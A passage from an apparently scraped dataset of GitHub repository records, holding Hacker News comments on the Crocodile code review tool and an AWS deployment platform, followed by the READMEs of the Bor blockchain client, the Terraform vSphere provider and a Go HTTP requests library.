on this complicated function combining whether the reviewer typed the text \":lgtm\", how many people looked at the review, whether they also hit the approve button. Each repo has its own configuration, and I can't make org-level changes without changing every repo one at a time.Excessive permissions - This might be a Github thing, but you can't grant Reviewable permissions to a particular private repo - you have to grant it permissions to all of your private repos. Several developers who join my team need to create a dedicated Github account to avoid exposing their other private repos to Reviewable.Thread state is unclear - The options are \"discussing\", \"satisfied,\" \"blocking,\" or \"working,\" and it's not obvious who's supposed to move the thread to what state at what point.No development - I've been a paying customer of Reviewable for about 7 years, and I can remember only 1-2 minor features that have been added during that time. They haven't updated their blog[2] in 6 years, and they've never communicated with me as a paying customer to tell me anything they're doing.I checked out Crocodile, and it looks like it has potential. I'm not sure I'd pitch it to my team to switch yet. Here are some of my thoughts:* When do the reviewer's comments become visible to the author? One of the must-have features for me is that both author and reviwer(s) can prepare a set of notes, but they're not visible to anyone else until they hit \"publish\" to share them with the team. Sometimes I make comments in one spot, and then as I read more of the code, I revise a previous comment. If all my comments publish immediately, I can't revise comments like that. Github, Reviewable, and Gerrit all support a flow of preparing comments and then committing them in a separate step.* Crocodile touts the floating thread thing, and I've never used a tool that has it, but it doesn't seem better to me. Inline comments do break the flow, but floating comments actually cover up the code and prevent me from reading it. I see I can close threads, but I can't figure out how to get them back.* Being able to comment on character-level granularity is cool!* I think your thread state is better than Reviewable's, but I'd prefer an even simpler model where threads are either \"open\" or \"resolved.\" When an author responds to a comment, the default action is to resolve it, but the author can override the default and leave it \"open\" if their comment is asking for clarification rather than declaring a fix. The reviewer can reopen a thread if they feel that the author has misunderstood the note. 95% of the time in my reviews, the reviewer makes a note and the author resolves it, so having a whole extra confirmation phase for that last 5% feels unnecessary when the reviewer can just reopen it instead.* Ditto for review state. The only two states I've ever needed for a code review are \"pending approval\" and \"approved.\" I've never wanted to mark a PR as \"rejected\" unless it's just a spam submission from a stranger on an open-source repo, and even then, I'd close it from Github rather than my code review tool. The worst I'll do to a teammate is withhold approval until they address my notes, but I'd never mark it as \"rejected.\" I don't need an explicit state for \"pending review\" or \"waiting for author\" because if the author is the last commenter, it's implicitly pending review.* I like that there's a view of all the comments at once. I like to review all my comments before pushing them to the author.* I'd like a way to mark a comment as \"no action required\" when I just want to say something nice[2] about the code that doesn't require action from the author.* I couldn't understand the \"iterations\" UI control. It's not obvious to me what the different circles represent.[4] Once I compared two diffs, I couldn't figure out how to compare to the the full PR to the base branch (i.e., all commits aggregated). I think it's replicating a control that Reviewable actually does pretty well, so I recommend giving it a look for inspiration.* It looks like I'm only allowed to make code-level comments, but I'd like to make review-level comments as well for high-level notes about the review as a whole.Hope that's useful. I'm very interested in code reviews, so if you want to do user interviews, feel free to reach out. You can find my contact info through my HN profile.[0] https://abseil.io/resources/swe-book/html/ch19.html[1] https://www.gerritcodereview.com/[2] http://blog.reviewable.io/[3] https://mtlynch.io/human-code-reviews-2/#offer-sincere-prais...[4] https://i.imgur.com/3ZhDAR1.pngCongratulations on the launch. I find reviewing code on GitHub to be a pain too, so we came up with DiffLens (https://github.com/marketplace/difflens). DiffLens is only concerned with showing better diffs though, and doesn't handle comments on GitHub at all. Maybe there's room here for us to combine our approaches :) Our email is support@difflens.com if you want to get in touch.> * Comments float above the code> * Comment on any text selection in the file> * Comments don't get lost when code changesThis addresses my main pet peeves with GitHub/Bitbucket reviews!2 questions:With regards to comments not getting lost, how well does this work across rebases and force pushes?Are you considering supporting other products like Bitbucket and Gitlab?Thanks for calling out that this was inspired by CodeFlow, I kept thinking that as I was reading. Still one of my favorite code review tools, used ~2012.One of my favorite features was a panel with every comment on the PR, sorted and organized by status. Because all files in the PR were preloaded clicking a comment instantly took you to the specific code and version. So good!I like the site + product idea, but the demo fails to show me anything interesting except a floating comment. So I can't yet see the value of the tool.The files you've chosen to use don't appear to show any difference between iteration 1 and 2, so one of your major features doesn't do anything. Is that a bug, or accidental? (I'm using Firefox 101 on MacOS 11.4).My personal dumb suggestion: give a few demos, showing off the very worst points of code review hell, and how crocodile fixes each one. Make it a game. E.g.\"You're halfway through a large code review, and Sally has just added 2 new commits, ugh. Challenge: find the button to see the new additions, then decide if you want to include them in your current review, or review this iteration first and the new additions separately.\"\"Simon has just added a merge commit that fucks everything up, all the files look weird. Challenge: there's a way you can trivially see that the PR before this extra commit was looking great.\"\"You can spot a new method that was introduced, and you'd like to see the places where it's being called, but that's a lot of scrolling back and forth. Challenge: find how to show code hints on a selected piece of text\"Nice idea! I'd be interested in giving it a try for our project in the future.It does seem that the demo review is broken in Safari, I get a JS error and the UI doesn't seem to work completely:> [Error] TypeError: e.connect is not a function. (In 'e.connect(l,s)', 'e.connect' is undefined)Also, is there any way to keep up-to-date on the project? I don't see a newsletter or Twitter link on your homepage.Oh wow, this looks great. Congratulations!This provides better UX but adds one more redirection when you are using github.Do you support features like github suggestions which can be committed easily by author?Given your history with Microsoft and their internal tool which this is inspired by, how long until github copies some of the ideas?How many active users does this have?Are there potential problems you see outside of current product?I remember a startup providing paid code reviews as a service launched on HN a while ago. That could be a pivot for example in providing more value.looks very interesting. a quick question about pricing: do we need to pay for all people in our github organization or can pick a few? we have some bot users, translator access, but only need the review tool for developers.Are there plans for Gitlab?I am a bit at odd with the pricing. My team has 6 engineers and base price for Github is $24. Your product would increase our bill by $48, an increase of 200%. $48 is nothing compared to the salaries of 6 engineers but I am not convinced the feature set would make my team more productive.If you told me that your solution help my team ship faster and saves an hour per engineer per week then that's easy math: your product pays for itself.Suggestions: - Make all base features free (the ones on your site currently)\n - Add analytics to your product, collect data and put it behind a paywall (entirely or partially by truncating historical data)\n - Iterate on premium features that improves critical metrics\n - Offer analytics with a trial of 2 to 3 months, enough time for graphs to speak for themselves\n - Make sure the gains are seen by the manager or business owner or whoever is the person in charge\n\nPricing can be based on the average of hours saved.It's worth trying. There's one quibble: How does Crocodile access my source code?\n\n Crocodile stores the source code files that are part of reviews to provide a \n fast user experience. Every file is encrypted with per file data encryption \n keys. The data encryption keys are then encrypted with a master encryption key. \n All cryptographic operations are performed using Google Tink, which is a \n cryptographic library created by cryptographers at Google that is designed to be misuse resistant.\n\n Files are encrypted using Stream AEAD using AES128_GCM_HKDF_4KB key type as recommended by Google.\n\n The data encryption keys above are encrypted using AEAD with a master AES128 key.\n\nSo, um, what's the story with the master encryption key? Are the master keys in their own file?\nE.g., if Crocodile gets hacked, can the hackers pull up everyone's reviews (and sources)? Or \ndoes all this encryption keep it encrypted at rest and require something from the user \n(e.g., their password) to derive the master key?Not a knock against crocodile, which looks like a nice set of improvements over gh, but something I\u2019d like to see done better in any code review system is significantly better code navigation.For any PR that is nontrivial I will pull it locally so that I can more easily navigate to functions/data types that are used by or changed in the PR. It would be nice if the review ui provided a way to click through to the definition of a symbol that appears in the code. (I think gh does this when browsing code for some languages.)A related helpful feature would be the ability to see \u201cwhat calls this\u201d. Currently I have to do this kind of review with \u2018git grep\u2019, after pulling locally.I\u2019d also love to be able to toggle into \u2018git blame\u2019 for a given bit of code, in order to better understand why the code is in its current stateNit: Couple typos on landing page: coversation, shorcut. Worth taking a pass with a spell checker.Congrats on the launch! Here's a demo link in case folks might have missed it:https://app.crocodile.dev/reviews/rwsfSKbgZoSt?change=README...This looks great! Food for thought on pricing: Because you offer free for open source, there\u2019s minimal need for a free trial for private repos. I would consider requiring a credit card and making it a 14 day trial. My experience selling SaaS in the past is this will net you fewer but much more serious evals, so whenever someone signs up you know they are legit and worth your time to contact and support. That leads to higher conversion, better retention, etc.Best of luck!This looks super interesting, it looks like it'd solve a few of my gripes with GitHub reviews. Congratulations on the launch!One thing I've always wondered is why all these review tools use centralised databases. Git itself is a distributed model and reviews tend to boil down to code comments on set of lines or characters. I'm always surprised no one has created a review tool that ships around reviews like patch files. Even if there was a server as an option, like github, I could then work offline and build little tools to help make my review process more efficient.I suppose it's not quite as easy to monitise as it's decentralised, but I'd love to see one crop up some day. Then my review process can match up with my coding process.Either way this looks like a big improvement in some areas over the GitHub tools so I'll definitely be checking it out.\u201cYou can comment anywhere in the file and on any text selection, even if it's just one character.\u201dI\u2019ve been looking for this feature forever. A changed line might impact code that wasn\u2019t changed. There wasn\u2019t a convenient way to comment on those. Looking forward to trying this.This looks fantastic! I'd love to try this out, but I don't have admin access to the repo I work in and IT will definitely not approve a random new app. Any chance I can set this up with a personal access token instead?My biggest issue with Github code reviews is how broken the \"Changes requested\" state is. If I request changes, there's no easy way to see that changes have been addressed and are clear for me to look at again.I end up using open unresolved comments as the basis for changes requested now. It's hard to filter for those though.Congrats on launch!How does this compare with Convox?As someone that is happy paying 5-10x more for heroku, you can easily get me (and people like me) if you focus on onboarding.Automatically generate the first yaml/config file from looking at my codebase? Heroku-like CLI that generates/updates the YAML file? Heroku gives me \"redis\" without me needing to learn anything about AWS/YAML-config shit.One-Click starter file for 10-most popular apps...- rails/postgres/redis- create-react-app- static site generator- node/serverlessHey Matus, good job!YAML validation and vscode extension is very cool. I hope it helps adoption.What about observability? Logging, monitoring, alerting? Security infrastructure, everything from setting up IAM with better security for both human and machine users, to vulnerability scanning, WAF, anti-DDoS, TLS certificates, DNS, edge caching/CDN...? Backups? Separate environments for development, staging, production, that stay consistent?Look, your landing page example is cute, but it's not fully production ready. And by the time you finish adding everything to make it fully production ready, you'll be back up to the 600 lines of configuration that you're currently demonizing.Look, this shit is hard. I get it. I recently got mindfucked by the intricacies of single table design in DynamoDB, and the sheer complexity of doing that correctly, for the sole benefit of hiring fewer $200k/year engineers, plus the headache of trying to hire the right ones, plus their post-hire management overhead. And that's barely DevOps adjacent!I'm not convinced that you can truly remove the complexity. The more features you throw on your PaaS, the more configuration options you expose. Eventually, the configuration for your PaaS gets complicated enough that you hire an engineer who knows the PaaS very well and they become your DevOps engineer. Then you realize that you didn't actually solve your problem, you just made it harder, because the PaaS never exposes everything you actually need, so either you need to wait for the PaaS to implement it, or you start to migrate off it.Appreciate it's just an MVP but I think there's a good niche you can go down. Big Data on AWS is such a pain to set-up (Glue, EMR, RedShift, LakeFormation), with IAM policies and roles a simple data pipeline is around 500 lines of YAML. Would be good if you could add native support for that, so say you have some CSV in S3 you want to convert to parquet, drop null fields, and then make shareable with another AWS account. Would solve a massive problem for meNot sure what to make of this. Given the active security incident, is \"Heroku-like\" really a recommendation?But even past that, what does this give me beyond AWS CodePipelines? All comparisons on the site seem to be against \"raw\" AWS (\"weeks to months\" from code to deployment, really?).But, hey, maybe I'm misunderstanding both this product and CodePipelines. Myself, I'm on Azure DevOps (which I guess is the same as \"MS Azure\" as opposed to \"Google Azure\"?), and there I can deploy my aspnetcore app to production in, like, 30s. Today.So, what can I look forward to in 2023 with this product?Very cool, maybe making a visual builder for YAML haters could be and additional killer feature.Looks interesting but makes little sense for Rails stacks at least, Hatchbox is some kind of de facto, especially at 15 US per server.I always think I should really look into automating deployment of Rails apps into a VPS. All these services seem to make really good money and I bet very few stacks beat the absolute hell that is to deploy Rails.This sounds very similar to AWS CDK. How does it compare?It's always painful to setup infra for any project that I do as I want to focus on aplication not doing the devops, I'll try this one outI have been very active in the PaaS in your cloud model in past. My analysis leads to the fact that no one has really pulled off heroku in your cloud kind product in recent time. There has been big exits like pivotal et al. Mind you it was before the kubernetes era. Post kubernetes era PaaS in your cloud has become very commoditized. As a PaaS-in-your-cloud (piyc) model as product you are not only competing with other product in the category list here [1] but also the internal platform teams in bigger orgs. Also, it is one of the competitive segment in devtool, devops space. Also having spent over 2 year in the space, I think heroku on AWS is an anti-thesis. I wanted heroku like experience I would start with heroku and not AWS. What you dont know yet is that it is a leaky abstraction as you start acquiring customers and very slow onboarding experience. AWS also made an attempt to build a heroku like product called app runner, which is I think is not that successful.[1]https://github.com/debarshibasak/awesome-paasLooks like a great product! I am also working on a similar product (https://cdevframework.io) in the same space, but I am focusing only on Python at the moment.Are you using a custom IaaC management tool for the deployments, or is it compiling down to something like Aws Cloudformation or Terraform Providers?This looks pretty cool. My main question is: what would I have to do if I require an AWS component that is not supported by this tool? What is the developer experience of having to include a CloudFormation stack alongside this solution?Asking because I see this as the #1 obstacle to getting buy-in in certain corporate environments. If we need a bit more flexibility, what does that look like?I wish you luck on your journey with this. We were in the similar space as a YC S20 company - trying to create a Heroku-like experience on AWS. There's been plenty other attempts as well.[1]After working in this space for a couple years, I realized that unfortunately the market just doesn't exist. Small enough teams will typically hack their way through building an MVP and early versions. They don't need/want the complexity of kubernetes/terraform, most literally run their MVP on a couple of instances. On the other side, once you get big enough, you hire dedicated people to start solving these problems. The middle market in between the two is very small and you most likely will be beat by the services already built into AWS such as Amplify.[1] https://github.com/debarshibasak/awesome-paasYou may want to put a comparison to Cloud66 on your website, since it's a similar tool (\"Heroku\" hosted on your own cloud account) that's been around for years.I think the comparisons on the site (e.g., vs. Heroku) are misleading. With Heroku (and true competitors such as Railway.app), I don't need to create configuration files for my app, for Redis and the PostgreSQL database I want to use, etc. I pick out some things from a UI, hook it up to my GitHub repo, and deploy (putting side the recent Heroku/GitHub OAuth security issues).I'd be interested in seeing Stacktape vs. Qovery, which seems a bit more closely related.Great idea! I'm curious how many options you're planning to cover. E.g. I couldn't find my use case of needing a Go Lambda triggered by a cron job that connects to an Aurora Postgres db.EDIT: Was trying to figure out a disparity in timing- I didn't know about the rescue pool feature!Years ago, there was a fantastic platform that did this called dotCloud. It worked great.That company spun off its technology into Docker and then shut down dotCloud, which I have always been sad about.Thanks for building this!The same issue I have with Render, I also have with this. If you have to create a config file for the environment, you aren't giving me a Heroku-like experience.Give me an opinionated default that works well for most situations that I can then build on top of, configure further, etc..Sorry I\u2019m sure that\u2019s a great and wonderful product, but I\u2019m so pissed off by yaml files that I can only hope one day humanity will figure out a better alternative to yaml and json for configuration files. I\u2019m using a lot of yaml with the serverless framework and I hate that. And no, infrastructure as code like terraform or aws cdk always looked too limited or strangely designedNot everyone is writing web apps.Do those solutions run on your smartphone? Your car? Your IoT devices?Custom code can also give businesses a competitve edge because they can do things that others using existing code cannot.> You need some APIs \u2192 API GatewayAn API Gateway doesn't make APIs?In the early years just after Faraday invented the electric motor in 1821, everything was custom. There we no established norms for wire, insulation, etc. Those only happened after sufficient practice in the art made the optimums, in 1883 according to Wikipedia.It wasn't until 1924 that the modern circuit breaker was invented to protect electrical circuits from overload.---The computer was invented circa 1946 by Von Neuman. It was back ported to the ENIAC, which made the machine much slower, but easier to program. Since that time, many standards have emerged, EBCDIC, ASCII, UTF-8, etc. All the basic technologies are in wide use, so standardization occurred. What we don't have yet is the equivalent to fuses or circuit breakers, or the common household outlet.We have no way of allocating only certain resources to a computing problem, and being sure of the lack of side effects. In effect, no standard for insulation from side effects.---All of this written to point out that nobody has a sure way to prevent unwanted side effects from a given line of code, and we're building stacks upon stacks of layers. Someone is going to have to sort this mess out and build standardized, UL certified (or equivalent) components for connecting up data sources and sinks. (Events are data, with timestamps)Once that happens, some of us will be the ones turning out modules, and the rest of us will be electricians, hooking all the bits together. I expect there will always be a need for programming, as we know it now, because it takes a rich expressive grammar to make interesting and useful things happen the first time. Once it's figured out, in can be productized, and shipped.> I know some of you will say they have some special custom app with very custom logic that is so unique that can only be done in code.Basically that's the way it is.As an Architect I have to look for no code solutions, then low code and if non fit only then do I have a justification for a custom build.Sometimes a solution is a combination of those techniques.You need to hang out with some stakeholders, those animals will easily come up with a feature that requires a crafted solution.35 years ago, that same question was asked, but in a different context. It was thought that when there are BASIC and spreadsheets there is no need to do any more serious coding.Even more so 25 years ago when various GUIs became ubiquitous.About 20 years ago, Flash and Dreamweaver were promising the same.You see where it's going.GitHub Copilot made me think of the same thing. I write the method description as a comment in plain English and it spits out a pretty good approximation of what I would have written. I've been using it only for a few weeks but I'm already so hooked up that I prefer to take a break when the service is down :DIf you are an insurance company the way you calculate premiums is absolutely critical to both sales and profitability. And these are not just algorithms, they are systems. Same applies wherever. If you can do without code you have no edge.Sounds naive. Do you have any experience with real-world projects? We're nowhere close to just writing some glue code. Web APIs are moving in that direction but the software world is a vast ocean and APIs are just a drop in the bucket.If you add up the cpu/memory requirements for redis, rabbitmq, mysql etc., that itself adds up to a beefy machine. Then the network traffic from the users.Better to package/run these as docker components on 2 beefy VM's w/ a LB from a provider like DigitalOcean, Vultr, Linode or Hetzner. You can pick up AWS etc, but be mindful of all the costs that add up.Kubernetes is a no-no unless you have some level of proficiency in kubernetes, or are willing to invest the time.Packaging your applications as docker images from the beginning requires little extra effort, but gives you a number of deployment options and if you grow it will be easy to move to eg. k8s.Setup your servers using ansible, puppet or similar to lower the requirements for redundancy and backups (if you cant take a little downtime in case of accident)If you're Europe based, one suggestion is to get two ~$50 servers from Hetzner and run all services in plain docker. (i.e. two servers for redundancy)Depending on your setup and requirements, it might even be enough to have one server + a cheap CDN and in that case you might even be able to run the server at home or a friends office.This is quite a bit of infrastructure for an app that hasn't launched yet. If it's not too late, consider simplifying by removing RabbitMQ or Redis. Perhaps even getting rid of both, and only using MySQL. Maybe your workers could become cron-jobs or threads.For hosting, consider Heroku and Heroku add-ons for MySQL, Redis, and RabbitMQ. You could run workers in Heroku as well.It would be possible to run this entirely in a VPS as well and fairly straightforward. I've also had success running the web app (with postgres and redis) in Heroku but the workers on a VPS.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "maticnetwork/bor", "link": "https://github.com/maticnetwork/bor", "tags": ["matic", "ethereum", "go", "bor"], "stars": 533, "description": "Official repository for the Matic Blockchain", "lang": "Go", "repo_lang": "", "readme": "# Bor Overview\nBor is the Official Golang implementation of the Matic protocol. It is a fork of Go Ethereum - https://github.com/ethereum/go-ethereum and EVM compatible.\n\n![Forks](https://img.shields.io/github/forks/maticnetwork/bor?style=social)\n![Stars](https://img.shields.io/github/stars/maticnetwork/bor?style=social)\n![Languages](https://img.shields.io/github/languages/count/maticnetwork/bor)\n![Issues](https://img.shields.io/github/issues/maticnetwork/bor)\n![PRs](https://img.shields.io/github/issues-pr-raw/maticnetwork/bor)\n![MIT License](https://img.shields.io/github/license/maticnetwork/bor)\n![contributors](https://img.shields.io/github/contributors-anon/maticnetwork/bor)\n![size](https://img.shields.io/github/languages/code-size/maticnetwork/bor)\n![lines](https://img.shields.io/tokei/lines/github/maticnetwork/bor)\n[![Discord](https://img.shields.io/discord/714888181740339261?color=1C1CE1&label=Polygon%20%7C%20Discord%20%F0%9F%91%8B%20&style=flat-square)](https://discord.gg/zdwkdvMNY2)\n[![Twitter Follow](https://img.shields.io/twitter/follow/0xPolygon.svg?style=social)](https://twitter.com/0xPolygon)\n\n## How to contribute\n\n### Contribution Guidelines\nWe believe one of the things that makes Polygon special is its coherent design and we seek to retain this defining characteristic. From the outset we defined some guidelines to ensure new contributions only ever enhance the project:\n\n* Quality: Code in the Polygon project should meet the style guidelines, with sufficient test-cases, descriptive commit messages, evidence that the contribution does not break any compatibility commitments or cause adverse feature interactions, and evidence of high-quality peer-review\n* Size: The Polygon project\u2019s culture is one of small pull-requests, regularly submitted. The larger a pull-request, the more likely it is that you will be asked to resubmit as a series of self-contained and individually reviewable smaller PRs\n* Maintainability: If the feature will require ongoing maintenance (eg support for a particular brand of database), we may ask you to accept responsibility for maintaining this feature\n### Submit an issue\n\n- Create a [new issue](https://github.com/maticnetwork/bor/issues/new/choose)\n- Comment on the issue (if you'd like to be assigned to it) - that way [our team can assign the issue to you](https://github.blog/2019-06-25-assign-issues-to-issue-commenters/).\n- If you do not have a specific contribution in mind, you can also browse the issues labelled as `help wanted`\n- Issues that additionally have the `good first issue` label are considered ideal for first-timers\n\n### Fork the repository (repo)\n\n- If you're not sure, here's how to [fork the repo](https://help.github.com/en/articles/fork-a-repo)\n\n- If this is your first time forking our repo, this is all you need to do for this step:\n\n ```\n $ git clone git@github.com:[your_github_handle]/bor\n ```\n\n- If you've already forked the repo, you'll want to ensure your fork is configured and that it's up to date. This will save you the headache of potential merge conflicts.\n\n- To [configure your fork](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/configuring-a-remote-for-a-fork):\n\n ```\n $ git remote add upstream https://github.com/maticnetwork/bor\n ```\n\n- To [sync your fork with the latest changes](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/syncing-a-fork):\n\n ```\n $ git checkout master\n $ git fetch upstream\n $ git merge upstream/master\n ```\n\n### Building the source\n\n- Building `bor` requires both a Go (version 1.19 or later) and a C compiler. You can install\nthem using your favourite package manager. Once the dependencies are installed, run\n\n ```shell\n $ make bor\n ```\n\n### Make awesome changes!\n\n1. Create new branch for your changes\n\n ```\n $ git checkout -b new_branch_name\n ```\n\n2. Commit and prepare for pull request (PR). In your PR commit message, reference the issue it resolves (see [how to link a commit message to an issue using a keyword](https://docs.github.com/en/free-pro-team@latest/github/managing-your-work-on-github/linking-a-pull-request-to-an-issue#linking-a-pull-request-to-an-issue-using-a-keyword).\n\n\n Checkout our [Git-Rules](https://docs.polygon.technology/docs/contribute/orientation#git-rules)\n\n ```\n $ git commit -m \"brief description of changes [Fixes #1234]\"\n ```\n\n3. Push to your GitHub account\n\n ```\n $ git push\n ```\n\n### Submit your PR\n\n- After your changes are commited to your GitHub fork, submit a pull request (PR) to the `master` branch of the `maticnetwork/bor` repo\n- In your PR description, reference the issue it resolves (see [linking a pull request to an issue using a keyword](https://docs.github.com/en/free-pro-team@latest/github/managing-your-work-on-github/linking-a-pull-request-to-an-issue#linking-a-pull-request-to-an-issue-using-a-keyword))\n - ex. `Updates out of date content [Fixes #1234]`\n- Why not say hi and draw attention to your PR in [our discord server](https://discord.gg/zdwkdvMNY2)?\n\n### Wait for review\n\n- The team reviews every PR\n- Acceptable PRs will be approved & merged into the `master` branch\n\n
\n\n## Release\n\n- You can [view the history of releases](https://github.com/maticnetwork/bor/releases), which include PR highlights\n\n
\n\n\n## License\n\nThe go-ethereum library (i.e. all code outside of the `cmd` directory) is licensed under the\n[GNU Lesser General Public License v3.0](https://www.gnu.org/licenses/lgpl-3.0.en.html),\nalso included in our repository in the `COPYING.LESSER` file.\n\nThe go-ethereum binaries (i.e. all code inside of the `cmd` directory) is licensed under the\n[GNU General Public License v3.0](https://www.gnu.org/licenses/gpl-3.0.en.html), also\nincluded in our repository in the `COPYING` file.\n\n
\n\n## Join our Discord server\n\nJoin Polygon community \u2013 share your ideas or just say hi over [on Discord](https://discord.gg/zdwkdvMNY2).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/terraform-provider-vsphere", "link": "https://github.com/hashicorp/terraform-provider-vsphere", "tags": ["terraform", "terraform-provider", "vsphere"], "stars": 533, "description": "Terraform Provider for VMware vSphere", "lang": "Go", "repo_lang": "", "readme": "\n\n \"Terraform\"\n\n\n# Terraform Provider for VMware vSphere\n\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/hashicorp/terraform-provider-vsphere?label=release&style=for-the-badge)](https://github.com/hashicorp/terraform-provider-vsphere/releases/latest) [![License](https://img.shields.io/github/license/hashicorp/terraform-provider-vsphere.svg?style=for-the-badge)](LICENSE)\n\nThe Terraform Provider for VMware vSphere is a plugin for Terraform that allows you to interact with VMware vSphere, notably [vCenter Server][vmware-vcenter] and [ESXi][vmware-esxi]. This provider can be used to manage a VMware vSphere environment, including virtual machines, host and cluster management, inventory, networking, storage, datastores, content libraries, and more.\n\nLearn more:\n\n* Read the provider [documentation][provider-documentation].\n\n* Join the community [discussions][provider-discussions].\n\n## Requirements\n\n* [Terraform 0.13+][terraform-install]\n\n For general information about Terraform, visit [terraform.io][terraform-install] and [the project][terraform-github] on GitHub.\n\n* [Go 1.19][golang-install]\n\n Required if building the provider.\n\n* [VMware vSphere][vmware-vsphere-documenation]\n\n The provider supports VMware vSphere versions in accordance with the VMware Product Lifecycle Matrix from General Availability to End of General Support.\n\n Learn more: [VMware Product Lifecycle Matrix][vmware-product-lifecycle-matrix]\n\n > **NOTE**\n >\n > This provider requires API write access and is therefore **not supported** for use with a free VMware vSphere Hypervisor license.\n\n## Using the Provider\n\nThe Terraform Provider for VMware vSphere is an official provider. Official providers are maintained by the Terraform team at [HashiCorp][hashicorp] and are listed on the [Terraform Registry][terraform-registry]. \n\nTo use a released version of the Terraform provider in your environment, run `terraform init` and Terraform will automatically install the provider from the Terraform Registry.\n\nUnless you are contributing to the provider or require a pre-release bugfix or feature, use an **officially** released version of the provider.\n\nSee [Installing the Terraform Provider for VMware vSphere][provider-install] for additional instructions on automated and manual installation methods and how to control the provider version.\n\nFor either installation method, documentation about the provider configuration, resources, and data sources can be found on the Terraform Registry.\n\n## Upgrading the Provider\n\nThe provider does not upgrade automatically. After each new release, you can run the following command to upgrade the provider:\n\n```shell\nterraform init -upgrade\n```\n\n## Contributing\n\nThe Terraform Provider for VMware vSphere is the work of many contributors and the project team appreciates your help!\n\nIf you discover a bug or would like to suggest an enhancement, submit [an issue][provider-issues]. Once submitted, your issue will follow the [lifecycle][provider-issue-lifecycke] process.\n\nIf you would like to submit a pull request, please read the [contribution guidelines][provider-contributing] to get started. In case of enhancement or feature contribution, we kindly ask you to open an issue to discuss it beforehand.\n\nLearn more in the [Frequently Asked Questions][provider-faq].\n\n## License\n\nThe Terraform Provider for VMware vSphere is available under the [Mozilla Public License, version 2.0][provider-license] license.\n\n[golang-install]: https://golang.org/doc/install\n[hashicorp]: https://hashicorp.com\n[provider-contributing]: docs/CONTRIBUTING.md\n[provider-documentation]: https://registry.terraform.io/providers/hashicorp/vsphere/latest/docs\n[provider-discussions]: https://discuss.hashicorp.com/tags/c/terraform-providers/31/vsphere\n[provider-faq]: docs/FAQ.md\n[provider-install]: docs/INSTALL.md\n[provider-issues]: https://github.com/hashicorp/terraform-provider-vsphere/issues/new/choose\n[provider-issue-lifecycke]: docs/ISSUES.md\n[provider-license]: LICENSE\n[terraform-install]: https://www.terraform.io/downloads.html\n[terraform-github]: https://github.com/hashicorp/terraform\n[terraform-registry]: https://registry.terraform.io\n[vmware-esxi]: https://www.vmware.com/products/esxi-and-esx.html\n[vmware-product-lifecycle-matrix]: https://lifecycle.vmware.com\n[vmware-vcenter]: https://www.vmware.com/products/vcenter-server.html\n[vmware-vsphere-documenation]: https://docs.vmware.com/en/VMware-vSphere\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "carlmjohnson/requests", "link": "https://github.com/carlmjohnson/requests", "tags": ["golang", "requests", "http", "http-client", "convenience", "helper"], "stars": 533, "description": "HTTP requests for Gophers", "lang": "Go", "repo_lang": "", "readme": "# Requests [![GoDoc](https://godoc.org/github.com/carlmjohnson/requests?status.svg)](https://godoc.org/github.com/carlmjohnson/requests) [![Go Report Card](https://goreportcard.com/badge/github.com/carlmjohnson/requests)](https://goreportcard.com/report/github.com/carlmjohnson/requests) [![Gocover.io](https://gocover.io/_badge/github.com/carlmjohnson/requests)](https://gocover.io/github.com/carlmjohnson/requests) [![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n\n![Requests logo](/img/gopher-web.png)\n\n## _HTTP requests for Gophers._\n\n**The problem**: Go's net/http is powerful and versatile, but using it correctly for client requests can be extremely verbose.\n\n**The solution**: The requests.Builder type is a convenient way to build, send, and handle HTTP requests. Builder has a fluent API with methods returning a pointer to the same struct, which allows for declaratively describing a request by method chaining.\n\nRequests also comes with tools for building custom http transports, include a request recorder and replayer for testing.\n\n## Examples\n### Simple GET into a string\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
code with net/httpcode with requests
\n\n```go\nreq, err := http.NewRequestWithContext(ctx, \n\thttp.MethodGet, \"http://example.com\", nil)\nif err != nil {\n\t// ...\n}\nres, err := http.DefaultClient.Do(req)\nif err != nil {\n\t// ...\n}\ndefer res.Body.Close()\nb, err := io.ReadAll(res.Body)\nif err != nil {\n\t// ...\n}\ns := string(b)\n```\n\n\n\n```go\nvar s string\nerr := requests.\n\tURL(\"http://example.com\").\n\tToString(&s).\n\tFetch(ctx)\n```\n\n
11+ lines5 lines
\n\n\n### POST a raw body\n\n\n\n\n\n\n\n\n\n\n\n
code with requestscode with net/http
\n\n```go\nerr := requests.\n\tURL(\"https://postman-echo.com/post\").\n\tBodyBytes([]byte(`hello, world`)).\n\tContentType(\"text/plain\").\n\tFetch(ctx)\n```\n\n\n\n```go\nbody := bytes.NewReader(([]byte(`hello, world`))\nreq, err := http.NewRequestWithContext(ctx, http.MethodPost, \n\t\"https://postman-echo.com/post\", body)\nif err != nil {\n\t// ...\n}\nreq.Header.Set(\"Content-Type\", \"text/plain\")\nres, err := http.DefaultClient.Do(req)\nif err != nil {\n\t// ...\n}\ndefer res.Body.Close()\n_, err := io.ReadAll(res.Body)\nif err != nil {\n\t// ...\n}\n```\n\n
5 lines12+ lines
\n\n### GET a JSON object\n\n\n\n\n\n\n\n\n\n\n\n
code with requestscode with net/http
\n\n```go\nvar post placeholder\nerr := requests.\n\tURL(\"https://jsonplaceholder.typicode.com\").\n\tPathf(\"/posts/%d\", 1).\n\tToJSON(&post).\n\tFetch(ctx)\n```\n\n\n\n```go\nvar post placeholder\nu, err := url.Parse(\"https://jsonplaceholder.typicode.com\")\nif err != nil {\n\t// ...\n}\nu.Path = fmt.Sprintf(\"/posts/%d\", 1)\nreq, err := http.NewRequestWithContext(ctx, \n\thttp.MethodGet, u.String(), nil)\nif err != nil {\n\t// ...\n}\nres, err := http.DefaultClient.Do(req)\nif err != nil {\n\t// ...\n}\ndefer res.Body.Close()\nb, err := io.ReadAll(res.Body)\nif err != nil {\n\t// ...\n}\nerr := json.Unmarshal(b, &post)\nif err != nil {\n\t// ...\n}\n```\n
7 lines18+ lines
